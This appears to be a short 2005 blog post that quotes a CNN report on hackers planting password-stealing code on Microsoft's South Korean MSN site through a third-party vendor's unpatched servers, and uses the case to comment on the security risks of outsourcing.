When outsourcing fails you

Microsoft's South Korean MSN site, apparently very popular, more so than the US version, is operated by a third party. This vendor apparently did not patch their servers hosting MSN Korea, allowing for the malicious code to be inserted. On the technical side, disconcerting is the (currently) unknown (or not made public) duration the malicious code was operating.

Source: CNN.com - Microsoft:MSN site hacked in South Korea - Jun 2, 2005.

Microsoft acknowledges that hackers booby-trapped its MSN Web site in South Korea to steal passwords from visitors.

More from the CNN story:

The Korean site, unlike U.S. versions, was operated by another company, which Microsoft did not identify. Microsoft's own experts and Korean police were investigating, but Microsoft believes the computers were vulnerable because operators failed to apply necessary software patches, said Sohn, an MSN director.

The Korean site, unlike U.S. versions, was operated by another company, which Microsoft did not identify. Microsoft's own experts and Korean police were investigating, but Microsoft believes the computers were vulnerable because operators failed to apply necessary software patches, said Sohn, an MSN director.

Security researchers noticed the suspicious programming added to the Korean site and contacted the company Tuesday. Microsoft traced the problem and removed the hacked computers within hours, Sohn said, but it doesn't yet know how long the dangerous programming was present.

I'm not bashing on Microsoft here, but this case is demonstrative of the security implications of outsourcing. It was apparently not until Microsoft got involved that the issue was quickly resolved.

The 'security researchers' mentioned could have been part of non-Microsoft trawlers looking for a security hole for the glory of discovery (the Internet's Magellans are alive and very busy) but what of the hacker looking for the exploitation?